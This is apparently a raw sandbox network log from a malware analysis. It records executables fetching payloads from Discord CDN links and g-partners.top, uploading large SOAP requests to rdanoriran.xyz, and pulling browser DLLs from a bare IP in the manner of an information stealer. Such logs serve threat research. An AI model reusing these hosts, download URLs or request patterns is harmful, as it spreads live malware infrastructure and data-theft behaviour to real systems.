                                                                                                                                                                                        GET
                                                                                                                                                                                        http://g-partners.top/stats/remember.php?pub=mixinte&user=Admin
                                                                                                                                                                                        2aNJWnHICffmGqno89GuHbVV.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        159.65.63.164:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /stats/remember.php?pub=mixinte&user=Admin HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Uvok-6Yh5-3moO-pCUX
                                                                                                                                                                                        Host: g-partners.top
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:20 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                                                                        X-Powered-By: PHP/5.4.16
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 225
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:25 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        rdanoriran.xyz
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        rdanoriran.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        rdanoriran.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        185.183.98.8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://rdanoriran.xyz/
                                                                                                                                                                                        rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.183.98.8:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: rdanoriran.xyz
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:26 GMT
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Keep-Alive: timeout=3
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://rdanoriran.xyz/
                                                                                                                                                                                        rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.183.98.8:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                                                                                                                                        Host: rdanoriran.xyz
                                                                                                                                                                                        Content-Length: 1869023
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://g-partners.top/dlc/distribution.php?pub=mixinte
                                                                                                                                                                                        2aNJWnHICffmGqno89GuHbVV.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        159.65.63.164:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /dlc/distribution.php?pub=mixinte HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        User-Agent: Uvok-6Yh5-3moO-pCUX
Host: g-partners.top
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:16:26 GMT
Server: Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Description: File Transfer
Content-Disposition: attachment; filename=null
Content-Transfer-Encoding: binary
Connection: close
Transfer-Encoding: chunked
Content-Type: application/octet-stream

• POST
http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address:
104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:16:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07ac820d0000223f0e057000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Ftr%2FszBwCumy0KXuwq7aY%2BUBVNJLRoEXAXj5zQ8HWEK7%2F0oGUIJDFStagKOhPzuciJ2rsDqMa3BVcCi6PZL%2BM7F8%2B1bHomkqf0RF9N0l9shjDbpz4SSwBIQjrIB7Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 668616b01e60223f-MIA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

• POST
http://lahuertasonora.com/upload/
Remote address:
220.125.1.129:80
Request
POST /upload/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lahuertasonora.com/upload/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 138
Host: lahuertasonora.com

• DNS
api.ip.sb
chrome.exe
Remote address:
8.8.8.8:53
Request
api.ip.sb
IN A
Response
api.ip.sb
IN CNAME
api.ip.sb.cdn.cloudflare.net
api.ip.sb.cdn.cloudflare.net
IN A
104.26.13.31
api.ip.sb.cdn.cloudflare.net
IN A
104.26.12.31
api.ip.sb.cdn.cloudflare.net
IN A
172.67.75.172

• GET
https://api.ip.sb/geoip
rwI3a3wTWh88dBrQa1ud4qdg.exe
Remote address:
104.26.13.31:443
Request
GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:16:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07ac88d90000d453d9aa2000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=4OY3U%2FTj4uoIrMR8fyaWQe3SCDFnntprO%2FZjW8S2%2FYStmeHY5ZhkbTfvdic8ZhoFHe%2BtL6Cxk0DnLt40pt0YKL6kazrA8Va6ysowgbvbrLz4ViXa6y0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 668616bafb23d453-HAM

• GET
https://cdn.discordapp.com/attachments/849802777433341954/849807598056112138/Setup2.exe
arnatic_6.exe
Remote address:
162.159.135.233:443
Request
GET /attachments/849802777433341954/849807598056112138/Setup2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:16:30 GMT
Content-Type: application/x-msdos-program
Content-Length: 2431039
Connection: keep-alive
CF-Ray: 668616c81e494162-HAM
Accept-Ranges: bytes
Age: 385525
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=Setup2.exe
ETag: "623c88cc55a2df1115600910bbe14457"
Expires: Sat, 02 Jul 2022 07:16:30 GMT
Last-Modified: Thu, 03 Jun 2021 00:32:00 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1622680320138453
x-goog-hash: crc32c=2s+41g==
x-goog-hash: md5=YjyIzFWi3xEVYAkQu+FEVw==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 2431039
X-GUploader-UploadID: ABg5-UwRnPDdZRdLdRXMzCRI4FR_NeKC5c0ej5l_JyYhMUQ5byhMSvSHPMCVKU7CtQUvRz0seWeUGniPu5nhULV1Cw
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=E3GCPW49bg24V6orBzCEsoqX1SL6UTgsiLL7NID3IxmefRp%2BZ13PcUMIzDNKSweir68cLbwgnxXcq1eaeJYBXsaGfMd5bYV0dJxhJ6Z8FHoMHRo1AUnEcaO%2BJ2ZkbsM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare

• GET
https://cdn.discordapp.com/attachments/849802777433341954/851833670733266955/jooyu.exe
arnatic_6.exe
Remote address:
162.159.135.233:443
Request
GET /attachments/849802777433341954/851833670733266955/jooyu.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:32 GMT
                                                                                                                                                                                        Content-Type: application/xml; charset=UTF-8
                                                                                                                                                                                        Content-Length: 223
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        CF-Ray: 668616d4c907dfe3-FRA
                                                                                                                                                                                        Age: 286
                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                        Expires: Fri, 02 Jul 2021 07:11:46 GMT
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                        Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        X-GUploader-UploadID: ADPycdvoZ2xnEl-tf9I9PPFARmx1ntT-pVKl6bUwZUuAjypEpef9u9OssukCcoCalC5bGnazYoZ_WArI1_0sbXRvv800wrCf2w
                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=M9SZ1YhuVyZGrBNPyjTxDlCnjSqtpHnwJZBP%2Bt%2Bc0uiUncSBa%2BBdRaPc9%2BpwqrfXglgA2LzlHBG4lcUE5XuUOGSaeMnZoGaDeu4lpOuxGD3B4UnUvsztz7pLe2DhIIs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        142.251.36.10
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.217.17.42
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.217.19.202
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.217.168.202
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        216.58.208.106
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.217.17.106
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.217.17.138
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        216.58.211.106
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        142.250.179.138
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        216.58.214.10
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        142.251.36.42
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.217.168.234
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        142.250.179.170
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        142.250.179.202
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://sergeevih43.tumblr.com/
                                                                                                                                                                                        VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        74.114.154.22:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Host: sergeevih43.tumblr.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:35 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Rid: 7b1a7f20c72aa297071436bf357ec6ad
                                                                                                                                                                                        P3p: CP="Tumblr's privacy policy is available here: https://www.tumblr.com/policy/en/privacy"
                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=15552001
                                                                                                                                                                                        X-Tumblr-User: sergeevih43
                                                                                                                                                                                        X-Tumblr-Pixel-0: https://px.srvcs.tumblr.com/impixu?T=1625210147&J=eyJ0eXBlIjoidXJsIiwidXJsIjoiaHR0cDovL3NlcmdlZXZpaDQzLnR1bWJsci5jb20vIiwicmVxdHlwZSI6MCwicm91dGUiOiIvIn0=&U=HKPJNCFACL&K=2f70e321ab048efd9a8144071a259310426deae8f19796321cbf717c12205751
                                                                                                                                                                                        X-Tumblr-Pixel: 1
                                                                                                                                                                                        Link: <https://assets.tumblr.com/images/default_avatar/octahedron_open_128.png>; rel=icon
                                                                                                                                                                                        Set-Cookie: pfg=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.tumblr.com; secure; HttpOnly
                                                                                                                                                                                        X-UA-Compatible: IE=Edge,chrome=1
                                                                                                                                                                                        X-UA-Device: desktop
                                                                                                                                                                                        Vary: X-UA-Device, Accept, Accept-Encoding
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://g-partners.top/dlc/distribution.php?pub=mixinte
                                                                                                                                                                                        2aNJWnHICffmGqno89GuHbVV.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        159.65.63.164:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /dlc/distribution.php?pub=mixinte HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        User-Agent: Uvok-6Yh5-3moO-pCUX
                                                                                                                                                                                        Host: g-partners.top
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:31 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                                                                        X-Powered-By: PHP/5.4.16
                                                                                                                                                                                        Content-Description: File Transfer
                                                                                                                                                                                        Content-Disposition: attachment; filename=null
                                                                                                                                                                                        Content-Transfer-Encoding: binary
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://sergeevih43.tumblr.com/
                                                                                                                                                                                        vt_ASiQuT3fR9eoJIz5PVk6E.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        74.114.154.22:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Host: sergeevih43.tumblr.com
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:37 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07acaee90000fda9e6a70000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=vGjnMz8BjzgyhNl1YNJQQUBe3qQb9SjTgFZSlc0evfHoQUBEoNSKB2u7t9lxaz45t1LAliY9wyW9Rip0Aeam6ZsUuL8A105wERwEPgKGHL7347r0QkamuwMSkl9IUA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668616f7dea4fda9-PDX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://157.90.127.76/932
                                                                                                                                                                                        VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /932 HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                                                                                        Content-Length: 25
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:40 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://157.90.127.76/freebl3.dll
                                                                                                                                                                                        VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /freebl3.dll HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:40 GMT
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                        Content-Length: 334288
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                                                                        ETag: "519d0-57aa1f0b0df80"
                                                                                                                                                                                        Expires: Sat, 03 Jul 2021 07:16:40 GMT
                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                        X-Cache-Status: EXPIRED
                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://157.90.127.76/mozglue.dll
                                                                                                                                                                                        VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /mozglue.dll HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:16:42 GMT
Content-Type: application/x-msdos-program
Content-Length: 137168
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "217d0-57aa1f0b0df80"
Expires: Sat, 03 Jul 2021 07:16:42 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes

GET http://157.90.127.76/msvcp140.dll
